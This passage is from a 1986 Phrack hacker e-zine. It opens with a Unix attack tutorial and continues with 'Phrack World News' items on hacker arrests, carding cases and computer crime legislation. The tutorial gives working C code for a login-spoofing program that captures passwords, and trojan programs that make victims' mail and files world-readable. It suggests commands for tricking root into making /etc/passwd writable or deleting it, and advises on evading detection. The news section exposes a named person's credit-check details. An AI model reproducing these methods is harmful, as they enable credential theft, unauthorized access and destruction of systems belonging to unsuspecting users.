logins, reading anybody's files, etcetera. This file will outline
|
||
such ways by presenting 'C' code that you can implement yourself.
|
||
|
||
Requirements
|
||
------------
|
||
You'll need a working account on a UNIX system. It should be
|
||
a fairly robust version of UNIX (such as 4.2bsd or AT&T System V)
|
||
running on a real machine (a PDP/11, VAX, Pyramid, etc.) for the
|
||
best results. If you go to school and have an account on the school
|
||
system, that will do perfectly.
|
||
|
||
Notes
|
||
-----
|
||
This file was inspired an article in the April, '86 issue of
|
||
BYTE entitled "Making UNIX Secure." In the article, the authors say
|
||
"We provide this information in a way that, we hope, is interesting and
|
||
useful yet stops short of being a 'cookbook for crackers.' We have
|
||
often intentionally omitted details." I am following the general
|
||
outline of the article, giving explicit examples of the methods they touched
|
||
on.
|
||
|
||
An unrelated note: Somewhere there's a dude running around using
|
||
the handle "Lord British" (not THE Lord British...). This is a message
|
||
for LB: "Fuck off and die."
|
||
|
||
Here we go...
|
||
|
||
Project One: Fishing For Passwords
|
||
-----------------------------------
|
||
|
||
You can implement this with only a minimal knowledge of UNIX and
|
||
C. However, you need access to a terminal that many people use -
|
||
the computer lab at your school, for example.
|
||
|
||
When you log onto a typical UNIX system, you see something like this:
|
||
|
||
Tiburon Systems 4.2bsd / System V (shark)
|
||
|
||
|
||
login: shark
|
||
Password: (not printed)
|
||
|
||
The program I'm giving you here simulates a logon sequence. You
|
||
run the program from a terminal and then leave. Some unknowing fool
|
||
will walk up and enter their login and password. It is written to a
|
||
file of yours, then "login incorrect" is printed, then the fool is
|
||
asked to log in again. The second time it's the real login program.
|
||
This time the person succeeds and they are none the wiser.
|
||
|
||
On the system, put the following code into a file called 'horse.c'.
|
||
You will need to modify the first 8 lines to fit your system's appearance.
|
||
|
||
|
||
----- Code Begins Here -----
|
||
|
||
/* this is what a 'C' comment looks like. You can leave them out. */
|
||
|
||
/* define's are like macros you can use for configuration. */
|
||
|
||
define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"
|
||
|
||
/* The above string should be made to look like the message that your
|
||
* system prints when ready. Each \n represents a carriage return.
|
||
*/
|
||
|
||
define LOGIN "login: "
|
||
|
||
/* The above is the login prompt. You shouldn't have to change it
|
||
* unless you're running some strange version of UNIX.
|
||
*/
|
||
|
||
define PASSWORD "password:"
|
||
|
||
/* The above is the password prompt. You shouldn't have to change
|
||
* it, either.
|
||
*/
|
||
|
||
define WAIT 2
|
||
|
||
/* The numerical value assigned to WAIT is the delay you get after
|
||
* "password:" and before "login incorrect." Change it (0 = almost
|
||
* no delay, 5 = LONG delay) so it looks like your system's delay.
|
||
* realism is the key here - we don't want our target to become
|
||
* suspicious.
|
||
*/
|
||
|
||
|
||
define INCORRECT "Login incorrect.\n"
|
||
|
||
/* Change the above so it is what your system says when an incorrect
|
||
* login is given. You shouldn't have to change it.
|
||
*/
|
||
|
||
define FILENAME "stuff"
|
||
|
||
/* FILENAME is the name of the file that the hacked passwords will
|
||
* be put into automatically. 'stuff' is a perfectly good name.
|
||
*/
|
||
|
||
/* Don't change the rest of the program unless there is a need to
|
||
* and you know 'C'.
|
||
*/
|
||
|
||
include <curses.h>
|
||
include <signal.h>
|
||
int stop();
|
||
|
||
main()
|
||
{
|
||
char name[10], password[10];
|
||
int i;
|
||
FILE *fp, *fopen();
|
||
signal(SIGINT,stop);
|
||
initscr();
|
||
printf(SYSTEM);
|
||
printf(LOGIN);
|
||
scanf("%[^\n]",name);
|
||
getchar();
|
||
noecho();
|
||
printf(PASSWORD);
|
||
scanf("%[^\n]",password);
|
||
printf("\n");
|
||
getchar();
|
||
echo();
|
||
sleep(WAIT);
|
||
|
||
|
||
if ( ( fp = fopen(FILENAME,"a") ) != NULL ) {
|
||
fprintf(fp,"login %s has password %s\n",name,password);
|
||
fclose(fp);
|
||
}
|
||
|
||
printf(INCORRECT);
|
||
endwin();
|
||
}
|
||
|
||
stop()
|
||
{
|
||
endwin();
|
||
exit(0);
|
||
}
|
||
|
||
|
||
----- Source Ends Here -----
|
||
|
||
OK, as I said, enter the above and configure it so it looks exactly
|
||
like your system's login sequence. To compile this program called
|
||
'horse.c' type the following two lines: (don't type the %'s, they are
|
||
just a sample prompt)
|
||
|
||
% cc horse.c -lcurses -ltermcap
|
||
% mv a.out horse
|
||
|
||
You now have the working object code in a file called 'horse'. Run it,
|
||
and if it doesn't look like your systems logon sequence, re-edit horse.c
|
||
and re-compile it. When you're ready to put the program into use, create
|
||
a new file and call it 'trap' or something. 'trap' should have these two
|
||
commands:
|
||
|
||
horse (this runs your program)
|
||
login (this runs the real login program)
|
||
|
||
to execute 'trap' type:
|
||
|
||
% source trap (again, don't type the %)
|
||
|
||
and walk away from your terminal...
|
||
|
||
After you've run it successfully a few times, check your file called
|
||
'stuff' (or whatever you decided to call it). It will look like this:
|
||
|
||
user john has password secret
|
||
user mary has password smegma
|
||
etc.
|
||
|
||
Copy down these passwords, then delete this file (it can be VERY
|
||
incriminating if the superuser sees it).
|
||
|
||
Note - for best results your terminal should be set to time-out after
|
||
a few minutes of non-use - that way, your horse program doesn't
|
||
run idle for 14 hours if nobody uses the terminal you ran it on.
|
||
|
||
-----
|
||
|
||
The next projects can be run on a remote system, such as the VAX in
|
||
Michigan you've hacked into, or Dartmouth's UNIX system, or whatever.
|
||
However, they require a little knowledge of the 'C' language. They're
|
||
not something for UNIX novices.
|
||
|
||
Project Two: Reading Anybody's Files
|
||
-------------------------------------
|
||
|
||
When somebody runs a program, they're the owner of the process created
|
||
and that program can do anything they would do, such as delete a file
|
||
in their directory or making a file of theirs available for reading
|
||
by anybody.
|
||
|
||
When people save old mail they get on a UNIX system, it's put into
|
||
a file called mbox in their home directory. This file can be fun
|
||
to read but is usually impossible for anybody but the file's owner
|
||
to read. Here is a short program that will unlock (i.e. chmod 777,
|
||
or let anybody on the system read, write or execute) the mbox file
|
||
of the person who runs the program:
|
||
|
||
----- Code Begins Here -----
|
||
|
||
include <pwd.h>
|
||
|
||
struct passwd *getpwnam(name);
|
||
struct passwd *p;
|
||
char buf[255];
|
||
|
||
main()
|
||
{
|
||
p = getpwnam(getlogin());
|
||
sprintf(buf,"%s/%s",p->pw_dir,"mbox");
|
||
if ( access(buf,0) > -1 ) {
|
||
sprintf(buf,"chmod 777 %s/%s",p->pw_dir,"mbox");
|
||
system(buf);
|
||
}
|
||
}
|
||
|
||
----- Code Ends Here -----
|
||
|
||
So the question is: How do I get my target to run this program that's
|
||
in my directory?
|
||
|
||
If the system you're on has a public-messages type of thing (on
|
||
4.xbsd, type 'msgs') you can advertise your program there. Put the
|
||
above code in another program - find a utility or game program in
|
||
some magazine like UNIX WORLD and modify it and do the above before
|
||
it does it's real thing. So if you have a program called tic-tac-toe
|
||
and you've modified it to unlock the mbox file of the user before it
|
||
plays tic-tac-toe with him, advertise "I have a new tic-tac-toe program
|
||
running that you should all try. It's in my directory." or whatever.
|
||
If you don't have means of telling everybody on the system via a public
|
||
message, then just send mail to the specific people you want to trap.
|
||
|
||
If you can't find a real program to modify, just take the above program
|
||
and add this line between the two '}' lines at the end of the program:
|
||
|
||
printf("Error opening tic-tac-toe data file. Sorry!\n");
|
||
|
||
when the program runs, it will print the above error message. The user
|
||
will think "Heh, that dude doesn't know how to write a simple tic-tac-
|
||
toe program!" but the joke's on him - you can now read his mail.
|
||
|
||
If there's a specific file in a user's directory that you'd like to
|
||
read (say it's called "secret") just throw together this general
|
||
program:
|
||
|
||
|
||
main()
|
||
{
|
||
if ( access("secret",0) > -1 ) system("chmod 777 secret");
|
||
}
|
||
|
||
then 'talk' or 'write' to him and act like Joe Loser: "I wrote this program
|
||
called super_star_wars, will you try it out?"
|
||
|
||
You can use your imagination. Think of a command you'd like somebody
|
||
to execute. Then put it inside a system() call in a C program and
|
||
trick them into running your program!
|
||
|
||
Here's a very neat way of using the above technique:
|
||
|
||
Project Three: Become the superuser
|
||
-----------------------------------
|
||
|
||
Write a program that you can get people to run. Put this line in
|
||
it somewhere:
|
||
|
||
if ( !strcmp(getlogin(),"root") ) system("whatever you want");
|
||
|
||
This checks to see if the root login is running your program. If
|
||
he is, you can have him execute any shell command you'd like.
|
||
Here are some suggestions:
|
||
|
||
"chmod 666 /etc/passwd"
|
||
|
||
/etc/passwd is the system's password file. The root owns this
|
||
file. Normally, everyone can read it (the passwords are encrypted)
|
||
but only the root can write to it. Take a look at it and see how it's
|
||
formatted if you don't know already. This command makes it possible
|
||
for you to now write to the file - i.e. create unlimited accounts for
|
||
yourself and your friends.
|
||
|
||
"chmod 666 /etc/group"
|
||
|
||
By adding yourself to some high-access groups, you can open many
|
||
doors.
|
||
|
||
"chmod 666 /usr/lib/uucp/L.sys"
|
||
|
||
Look for this file on your system if it is on the uucp net. It
|
||
contains dialups and passwords to other systems on the net, and normally
|
||
only the uucp administrator can read it. Find out who owns this file
|
||
and get him to unknowingly execute a program to unlock it for you.
|
||
|
||
"rm /etc/passwd"
|
||
|
||
If you can get the root to execute this command, the system's
|
||
passwd file will be removed and the system will go down and will
|
||
not come up for some time to come. This is very destructive.
|
||
|
||
-----
|
||
|
||
If you are going to go about adding a trojan horse program to the
|
||
system, there are some rules you should follow. If the hidden purpose
|
||
is something major (such as unlocking the user's mbox or deleting all
|
||
of his files or something) this program shouldn't be a program that
|
||
people will be running a lot (such as a popular computer game) - once
|
||
people discover that their files are public access the source of the
|
||
problem will be discovered quite easily. Save this purpose for a 'test'
|
||
program (such as a game you're in the process of writing) that you
|
||
ask individual people to run via mail or 'chatting' with them. As I
|
||
said, this 'test' program can bomb or print a phony error message after
|
||
completing its task, and you will just tell the person "well, I guess
|
||
it needs more work", wait until they log off, and then read whatever
|
||
file of theirs that you've unlocked. If your trojan horse program's
|
||
sole purpose is to catch a specific user running it - such as the
|
||
root or other high-powered user - you can put the code to do so
|
||
in a program that will be run a lot by various users of the system.
|
||
Your modification will remain dormant until he runs it.
|
||
If you can't find the source to 'star trek' or whatever in C, just
|
||
learn C and convert something from pascal. It can't hurt to learn
|
||
C as it's a great language. We've just seen what it can do on a
|
||
UNIX system. Once you've caught the root (i.e. you can now modify
|
||
the /etc/passwd file) remove the spurious code from your trojan horse
|
||
program and you'll never be caught.
|
||
|
||
That's it...if you have any questions or comments or you just want
|
||
to bitch at me, call this system:
|
||
|
||
The Matrix
|
||
415/922-2008
|
||
101 megs, IBM warezzz, 2400 baud, Phrack sub-board, etc.
|
||
|
||
Lord British, I *dare* you to call.
|
||
|
||
(>
|
||
=========================================================================
|
||
|
||
==Phrack Inc.==
|
||
|
||
Volume One, Issue 7, Phile 8 of 10
|
||
|
||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||
PWN PWN
|
||
PWN *^=-> Phrack World News <-=^* PWN
|
||
PWN PWN
|
||
PWN Issue VI/Part 1 PWN
|
||
PWN PWN
|
||
PWN Compiled and Written by PWN
|
||
PWN PWN
|
||
PWN Knight Lightning PWN
|
||
PWN PWN
|
||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||
|
||
Oryan QUEST Vs. Dan Pasquale June 21, 1986
|
||
----------------------------
|
||
Yes, our buddy from the west coast is back in action, this time against Oryan
|
||
QUEST. Oryan QUEST was busted on April 6, 1986 (See PWN Issue IV Part 2), for
|
||
hacking AT&T Mail, by the San Mateo Police Department and the FBI. Because of
|
||
legal technicalities, the charges were dropped but, Oryan's computer was
|
||
confiscated and never returned. He has since bought a new computer (IBM AT)
|
||
and is now back among us.
|
||
|
||
It is believed that someone (Dan Pasquale?) must have found Oryan's notebook
|
||
which contained his passwords on to bulletin boards around the country. One
|
||
example of this is "The Radio Station Incident" (See PWN Issue IV Part 3) where
|
||
a fake Oryan QUEST wandered the BBS and when questioned as to his legitimacy
|
||
quickly dropped carrier.
|
||
|
||
Most recently Oryan QUEST has been getting job offers in computer security. He
|
||
hasn't accepted any at this time. Also he has been getting several calls from
|
||
Dan Pasquale. Dan wants Oryan's help to bust any and all hackers/phreaks. Dan
|
||
is very pissed these days because someone charged $1100.00 worth of Alliance
|
||
Teleconferences to his phone bill and now he wants revenge. He has stated that
|
||
one of his main projects is to bust P-80, sysoped by Scan Man. Dan Pasquale
|
||
says that Scan Man works for a long distance communications carrier. I
|
||
personally think he has as much of a chance of busting P-80 Systems as a
|
||
snowball staying frozen in a microwave.
|
||
|
||
Lets face it, if John Maxfield and the other investigators haven't busted P-80
|
||
yet, they never will...let alone some little police sergeant in California.
|
||
Dan also added that he is going to "hose" Speed Demon Elite. He claims that he
|
||
is already a member of SDE and that its only a matter of time before he takes
|
||
it down forever. He also mentioned that he has placed a Dialed Number Recorder
|
||
(DNR) on Radical Rocker's phone lines. Furthermore, it was learned that Dan
|
||
Pasquale managed to get an account on to The Underground, sysoped by Night
|
||
Stalker. It is unknown as to if Dan has anything to do with Night Stalker's
|
||
bust.
|
||
|
||
Dan Pasquale also said, "I will bust these hackers any way I can!" To really
|
||
understand what that statement means you would probably have to live in
|
||
California. What Pasquale was referring to was moving violations. If you (a
|
||
driver under 21) receive any type of moving violation, both your insurance
|
||
company and your parents are notified. This raises your insurance rates and
|
||
gets you into trouble. If you get two moving violations, kiss your license
|
||
goodbye for at least 2 years.
|
||
|
||
Radical Rocker having heard about Dan Pasquale's plans to destroy Speed Demon
|
||
Elite, went on a user purge and has destroyed any and all accounts that were
|
||
held by those that he did not know personally. Speed Demon Elite is now a
|
||
private BBS and supposedly Radical Rocker has now cleared things up with Dan
|
||
Pasquale.
|
||
Information provided by Oryan QUEST and Radical Rocker
|
||
_______________________________________________________________________________
|
||
|
||
Marx and Tabas: The Full Story July 1,1986
|
||
------------------------------
|
||
It all started with Cory Andrew Lindsly aka Mark Tabas, age 19. He worked for
|
||
the Colorado Plastic Card Company and had access to the plastic cards that
|
||
credit cards were made with. He had taken 1350 and stashed them away for later
|
||
usage.
|
||
|
||
His plan would have went perfectly if not for Steve Dahl. He was busted in
|
||
Miami by the US Secret Service for whatever reasons. They gave him a chance to
|
||
play ball. Dahl had heard about Mark Tabas and Karl Marx's scheme and after
|
||
informing the Secret Service about this he was given an embossing machine.
|
||
Steve Dahl then flew to Denver and set up the meeting. Mark Tabas lived in
|
||
Denver and wanted his friend James Price Salsman aka Karl Marx, age 18, to join
|
||
in on the fun. So Marx flew down on a carded plane ticket that Tabas had
|
||
signed for.
|
||
|
||
The meeting took place in a room at the Denver Inn. The room was bugged and 19
|
||
cards (Visa, MasterCard, and some blanks) were made from a possible 140 that
|
||
they had brought. They decided to celebrate by ordering champagne on the card
|
||
of Cecil R. Downing.
|
||
|
||
A member of the Secret Service actually delivered the champagne to the room
|
||
disguised as a waiter. Tabas signed for the drinks and the twosome were
|
||
nailed. To make matters worse the SS also matched Tabas's signature with the
|
||
signature used to buy the carded plane ticket.
|
||
-------------------------------------------------------------------------------
|
||
The sentencing goes like this: Maximum: 10,000 dollars (Local Law)
|
||
Maximum: 250,000 (Federal Law)
|
||
Maximum: 10 years in jail (both)
|
||
|
||
Or any combination of the three.
|
||
|
||
Both Tabas and Marx were let out on bail of five thousand dollars each. The
|
||
actually charge is: The manufacturing and possession of unauthorized access
|
||
devices. The U.S. Magistrate Hilbert Schauer will be overhearing the case.
|
||
|
||
There is a rumor that charges on Salsman were dropped and that he is in no
|
||
trouble at all since he didn't actually buy the plane ticket, he was given it,
|
||
he didn't steal the cards, and he didn't emboss them. So supposedly the Secret
|
||
Service let Marx go because he didn't know about the cards, he was just there
|
||
at the wrong time.
|
||
|
||
Information Provided By The Denver Post and Sally Ride:::Space Cadet
|
||
_______________________________________________________________________________
|
||
|
||
The Saga Of Mad Hacker July 15, 1986
|
||
----------------------
|
||
Mad Hacker of 616 NPA 616 wrote a random Compuserve hacker because he was bored
|
||
and wanted something to do. It ran constantly for about a week and was he
|
||
surprised when it came up with an account. However he made the mistake of not
|
||
checking to see whose account it was, he used the SIG's (Special Interest
|
||
Group's) and ran up a bill slightly under $300.
|
||
|
||
About a month later he was living over at a friend's house and the owner of the
|
||
account showed up, who just happened to be a family friend of the people that
|
||
MH was staying with. He asked both of them (the teenagers that is) if they
|
||
were using his account (they all had Compuserve accounts and the family knew
|
||
they were computer buddies). Mad Hacker said no and truthfully meant it.
|
||
|
||
Now around July 1, 1986 the account owner turned the matter over to the
|
||
Kalamazoo Police Department since CIS (Compuserve) could not find anything out
|
||
beyond the dialup used to access the account. The police called around to
|
||
everyone in the area ("everyone" meaning all the "real" hacks and phreaks, not
|
||
rodents who think they're bad because they use handles) including Thomas
|
||
Covenant and Double Helix. Most of everyone instantly forgot that Mad Hacker
|
||
ever existed, but somehow they got a hold of the phone number where he was
|
||
staying (at the time he was staying at his girlfriend's house, he was not
|
||
living there before) and contacted the owner of the account and put out a
|
||
warrant for Mad Hacker's arrest.
|
||
|
||
As of now, Mad Hacker faces *FELONY* charges because of the large amount of the
|
||
bill. The warrant for his arrest has been suspended, letting the account owner
|
||
to handle things in his own way. The owner has confiscated all of Mad Hacker's
|
||
computer equipment (3 computers and hardware etc.) until the bill is completely
|
||
paid back.
|
||
|
||
Mad Hacker has progressed from merely delivering clever obscenities over the
|
||
fone to his adversary to actual vengeance. One example in the planning stages
|
||
will be in the form of camping out in said account owner backyard (in a rural
|
||
area), hooking up to a junction box, and running the account owner's Long
|
||
Distance phone bill out of sight.
|
||
|
||
Mad Hacker is supposed to have a file on Junction Box Modeming coming soon, he
|
||
is currently borrowing a computer from a friend.
|
||
|
||
Information Provided by Thomas Covenant
|
||
_______________________________________________________________________________
|
||
|
||
Lock Lifter *Busted* July 2, 1986
|
||
--------------------
|
||
Lock Lifter was busted for hacking an MCI Vax. he had downloaded a list of MCI
|
||
Calling Cards that he later abused and in return he received a *free* DNR on
|
||
his line for about 3 months. He was also given a scare from MCI Investigations
|
||
(for unknown reasons) previous to his visit from law enforcement officers and
|
||
as such his BBS, The Black Chamber, was deleted and the userfiles were
|
||
destroyed, so there really isn't much to worry about from the user's
|
||
standpoint.
|
||
|
||
Lock Lifter had been making plans to take his board down anyway, so being
|
||
without The Black Chamber is just an adjustment we would have had to make
|
||
eventually regardless of Lock Lifters bust.
|
||
|
||
Information Provided By
|
||
Arthur Dent/Cyclone II/Kerrang Khan/The Seker
|
||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||
Some notes from Cheap Shades:
|
||
|
||
"I was told by Arthur Dent that Lock Lifter did not have his computer anymore,
|
||
but someone using LL's password called my AE, Metal Shop AE (for which he had
|
||
lost his AE access but could still log on), and left me feedback in all caps
|
||
(not like LL would do) that said something like PLEASE GIVE ME ACCESS TO THE
|
||
GO AE FUNCTION." Arthur Dent has now confirmed that Lock Lifter did not make
|
||
the call in question and that there is definitely a fed or someone with Lock
|
||
Lifter's BBS passwords. Sysops be warned.
|
||
_______________________________________________________________________________
|
||
|
||
Daniel Zigmond: The Plot Thickens July 13, 1986
|
||
----------------------------------
|
||
Daniel Zigmond appeared, for a short time, on Pirate-80. Scan Man let him on
|
||
to make a statement and then shut him off the board. It is now left to the
|
||
users to decide whether or not he should be allowed back on.
|
||
|
||
Information by Sally Ride:::Space Cadet
|
||
|
||
Some sources say that we are seeing "Whacko Cracko" syndrome, where the story
|
||
gets more and more bizarre as versions get modified. Like TWCB, Zigmond
|
||
supposedly says one thing to one person and something different to the next,
|
||
depending on what he thinks they may want to hear.
|
||
|
||
The following information was found under in an anonymous post on an unspecific
|
||
bulletin board. It would appear that someone performed a credit check on
|
||
Daniel Zigmond (with TRW) and came up with some very interesting results.
|
||
|
||
As many of you should know, TRW keeps records of all major transactions you
|
||
make, credit cards you have, house or car payments, bank accounts you own, your
|
||
job, and many other things. Daniel Zigmond's TRW account is a little
|
||
different, it has been flagged and the information is not there. What it does
|
||
show is that Daniel Zigmond holds the position of Staff Programmer at Carnegie
|
||
Mellon University, a technical school in Pittsburgh, Pennsylvania. It also
|
||
shows that he was born in 1959 and although it would appear that he is 27,
|
||
Daniel claims to be 26. TRW lists his only bank account as being at the
|
||
Pittsburgh National Bank.
|
||
|
||
What this would mean is that Zigmond has never owned a car, never rented a car,
|
||
never owned or rented a house, never had a credit card, never made any major
|
||
transactions, and has only one bank account.
|
||
|
||
During teleconferences on July 15th and 16th, several members of the PhoneLine
|
||
Phantoms and myself questioned Zigmond about his TRW account and several other
|
||
things. Zigmond claims to know nothing about why his account is like this and
|
||
up till we brought up the fact that he worked at CMU, he had been telling
|
||
people that he was a reporter only.
|
||
|
||
As far as his reasons for needing codes, passwords, etc... He says its so his
|
||
boss (whomever it will be) will believe the story. Why shouldn't he believe
|
||
it? Haven't there been enough articles on hackers and phreakers in the past?
|
||
Its been in the news very often and I'm sure that everyone remembers the
|
||
Richard Sandza articles, "Night of The Hackers" and "Revenge of The Hackers"
|
||
from Newsweek Magazine.
|
||
|
||
Most recently Daniel Zigmond has been speaking with several members of the Neon
|
||
Knights and he has obtained an account on the BBS World's Grave Elite, which is
|
||
sysoped by Sir Gamelord, the Vice-President of the P.H.I.R.M.
|
||
|
||
All hackers and phreaks are welcome to call him to be interviewed, although I
|
||
advise against it. Please do not call up to rag on him because it is
|
||
pointless. One example happened during the 2nd conference when someone called
|
||
on Danny's other line. They said "did we wake you up?" Danny said "no" and
|
||
then they hung up.
|
||
|
||
Information Provided By Daniel Zigmond
|
||
_______________________________________________________________________________
|
||
|
||
TeleComputist; Subscribe Now! July 25, 1986
|
||
-----------------------------
|
||
From: Forest Ranger and TeleComputist staff,
|
||
To: You!
|
||
|
||
TeleComputist has had a very positive response up to this time and we have
|
||
received many requests for the free sample issue and now it is time to
|
||
subscribe.
|
||
|
||
For the sample free issue please self addressed stamped envelope with 39 cents
|
||
postage to: TeleComputist Newsletter P.O. Box 2003 Florissant, Mo. 63032
|
||
|
||
Also, please send subscriptions to the same address. The subscription fee for
|
||
the newsletter will be twelve dollars a year, fifty cents for back issues.
|
||
This is a monthly circulation and we encourage letters.
|
||
|
||
Information Provided by Telecomputist Staff
|
||
|
||
Telecomputist Newsletter/BBS (314)921-7938
|
||
|
||
[KL's notes: Both Taran King and I have seen the first issue and it is damn
|
||
good. This is NOT a scam, we know the TeleComputist Staff personally and they
|
||
will NOT rip you off. The newsletter itself is of fine quality both in its
|
||
print and content. The sample issue was merely a shadow of the upcoming issues
|
||
and it will continue to get better as time goes on. It is definitely worth the
|
||
twelve dollars for the year subscription.]
|
||
_______________________________________________________________________________
|
||
|
||
|
||
=========================================================================
|
||
|
||
==Phrack Inc.==
|
||
|
||
Volume One, Issue 7, Phile 9 of 10
|
||
|
||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||
PWN PWN
|
||
PWN *^=-> Phrack World News <-=^* PWN
|
||
PWN PWN
|
||
PWN Issue VI/Part 2 PWN
|
||
PWN PWN
|
||
PWN Compiled and Written by PWN
|
||
PWN PWN
|
||
PWN Knight Lightning PWN
|
||
PWN PWN
|
||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||
|
||
U.S. Telecom Retiring Uninet May 26, 1986
|
||
----------------------------
|
||
"Uninet is coming down"
|
||
|
||
Reston, Va. - U.S. Telecom Data Communications Company, Uninet Packet Switching
|
||
Network will be retired as a result of the proposed merger of the company with
|
||
GTE Telenet Communications Corporation.
|
||
|
||
The move came to light last week as a joint transition study team completed a
|
||
plan detailing how the two companies will be merged. The merger is a result of
|
||
a joint venture spawned by the two companies parents, GTE Corporation and
|
||
United Talecommunications Inc.
|
||
|
||
The packet switches and related equipment which make up Uninet will be sold
|
||
where possible, but a good deal of the equipment is likely to be discarded, a
|
||
spokesman for the joint venture said.
|
||
|
||
Under the plan, the capacity of GTE Telenet Packet Switching Network will be
|
||
increased to handle additional traffic resulting from transference of U.S.
|
||
Telecom customers to Telenet, according to the spokesman.
|
||
|
||
The study groups considered integrating Uninet and Telenet because the external
|
||
interfaces of each network are compatible but the internal protocols each
|
||
network uses for functions such as networks management are substantially
|
||
different and any attempt toward integration would require a massive
|
||
development effort, spokesman said.
|
||
|
||
Moving Uninet's traffic to Telenet is far cheaper. Telenet currently supports
|
||
six times as much traffic as Uninet, which means Telenet's capacity must only
|
||
be incremented by one sixth.
|
||
|
||
Uninet will be phased out over a 120 day transition period, to begin when the
|
||
joint venture is approved. The merger plan calls for all personnel of U.S.
|
||
Telecom and GTE Telenet to be offered jobs with U.S. Sprint (now called U.S.
|
||
Sprint, not Sprint/U.S. Telecom company since recent merger). The new company
|
||
is headquartered in Reston, Virginia where GTE Telenet is currently
|
||
headquartered. Submitted by Scan Man to Phrack Inc. From Communications Week,
|
||
May 26 Issue
|
||
_______________________________________________________________________________
|
||
|
||
P-80 Newsfile
|
||
-------------
|
||
Computer Crime Bill Amended May 14, 1986
|
||
----------------------------
|
||
After three years of Congressional hearings, the U.S. House of Representatives
|
||
is finally getting ready to act on a computer crime bill, but like everything
|
||
else in Congress many different people have input, and the focus and scope of
|
||
pending computer crime bills have changed in important ways during the past few
|
||
months.
|
||
|
||
When bills are altered significantly, they are often written as "clean bills"
|
||
and given new numbers. Computer crime measures are changing so fast it is
|
||
difficult to keep track of them.
|
||
|
||
What started out as The Counterfeit Access Device and Computer Fraud Act (HR
|
||
1001) became late last month The Computer Fraud and Abuse Act (HR 4562) which,
|
||
although it has retained the same title, is now dubbed HR 4718 following the
|
||
addition of some minor amendments.
|
||
|
||
The new bill, sponsored by Rep. William Hughes (D-N.J.), is very similar to the
|
||
old one, however, and would impose severe penalties for illegally accessing
|
||
government and financial computers and crack down on illegal computer bulletin
|
||
board systems.
|
||
|
||
For more information on HR 4718, check the menu for bills in the US House of
|
||
Representatives in the Legislation Database.
|
||
|
||
Information Provided by Cathryn Conroy
|
||
-------------------------------------------------------------------------------
|
||
House Committee Approves New Computer Crime Bill May 14, 1986
|
||
------------------------------------------------
|
||
The House Judiciary Committee has approved and sent to the full House a new
|
||
computer crime bill that would impose severe penalties for illegally accessing
|
||
government and financial computers and crack down on illegal computer bulletin
|
||
board systems.
|
||
|
||
The bill (HR 4718), sponsored by Rep. William Hughes (D-N.J.), was passed by
|
||
voice vote with no objection. It is aimed at closing loopholes in existing law
|
||
and at helping to eliminate the "national malaise" of computer crime, Hughes
|
||
said.
|
||
|
||
The bill "will enable us to much more effectively deal with the emerging
|
||
computer criminal in our society," said Hughes, who chairs the House crime
|
||
subcommittee.
|
||
|
||
Rep. Bill McCollum (R-Fla.), the ranking Republican on the crime subcommittee,
|
||
added his support for the bill. He said it is time the nation began cracking
|
||
down on computer criminals.
|
||
|
||
"We demand privacy, yet we glorify those that break into computers," McCollum
|
||
said, citing films and television shows that have painted a sympathetic
|
||
portrait of computer criminals.
|
||
|
||
The committee agreed to a single amendment to the bill -- one that would extend
|
||
the list of computer systems protected by the measure to include those run by
|
||
the brokers and dealers regulated by the Securities and Exchange Commission.
|
||
McCollum, who sponsored the amendment, said the brokers and dealers provide
|
||
some of the same services as banks and should receive equal protection against
|
||
computer trespassers.
|
||
|
||
The bill was reported out unanimously from the crime subcommittee. Hughes said
|
||
an identical companion measure is moving through the Senate and that he expects
|
||
the bill will become law before the end of the 99th Congress in December.
|
||
Hughes and McCollum agreed that the bill will help eliminate another glaring
|
||
example of the failure of existing federal law to keep pace with technological
|
||
advances.
|
||
|
||
"For the most part," he said, "our laws are rooted in the concept of property
|
||
crimes, where someone trespasses into or steals another person's property.
|
||
"With computer crimes, the trespassing or theft is done electronically, not
|
||
physically," he added. "Although the losses are often just as great or even
|
||
greater than property crime, our laws are not current enough to keep pace with
|
||
the changing technology used by the criminals."
|
||
|
||
Hughes was the author of the nation's first computer crime law in 1984. That
|
||
bill established a new federal crime for unauthorized access to classified
|
||
information in government computers and a misdemeanor for accessing any federal
|
||
computer or computer containing financial or credit information. The new
|
||
measure would establish a:
|
||
|
||
-:- New felony for trespassing into federal interest computers, those run by or
|
||
for the federal government, banks or states. Offenders would face five-year
|
||
prison terms.
|
||
|
||
-:- Second felony for "maliciously trespassing" into a federal interest
|
||
computer and causing more than $1,000 in damage.
|
||
|
||
-:- New category of federal misdemeanors involving the use of illegal BBSes to
|
||
post private information, such as credit card data, phone account
|
||
information and passwords.
|
||
|
||
"We need to establish clear guidelines for protecting the information stored in
|
||
computers and for cracking down on those who knowingly put computers to
|
||
criminal of malicious use," Hughes said.
|
||
|
||
Information Provided by J. S. Orr
|
||
-------------------------------------------------------------------------------
|
||
Access To Government Computers Clarified June 9, 1986
|
||
----------------------------------------
|
||
Sen. Charles McC. Mathias (R- Md.) has introduced a bill in the U.S. Senate
|
||
that would amend Section 1030 of Title 18 of the United States Code with the
|
||
purpose of clarifying coverage with respect to access to computers operated for
|
||
or on behalf of the federal government.
|
||
|
||
The legislation would clearly impose penalties on anyone who modified,
|
||
destroyed or prevented use of information in a government computer system or
|
||
who used or disclosed individually identifiable information in such a computer.
|
||
The bill has been referred to the Senate Committee on The Judiciary. No
|
||
subcommittee has yet been assigned.
|
||
|
||
Information Provided by Cathryn Conroy
|
||
_______________________________________________________________________________
|
||
|
||
Tap Interviews II...by Dead Lord July 14, 1986
|
||
--------------------------------
|
||
The infamous Dead Lord is back and this time with an anonymous rag file that he
|
||
entitled Tap Interviews II to start people thinking that the Infiltrator had
|
||
written it. Lets look at this file in parts.
|
||
|
||
First Dead Lord starts out by saying that he is Infiltrator and then changes
|
||
his mind and becomes Sharp Razor (who is supposedly in prison). His first
|
||
interview was an imaginary exchange of words between him and Lex Luthor of the
|
||
Legion Of Doom. The interview also was used to rag on Infiltrator by the way
|
||
it was presented.
|
||
|
||
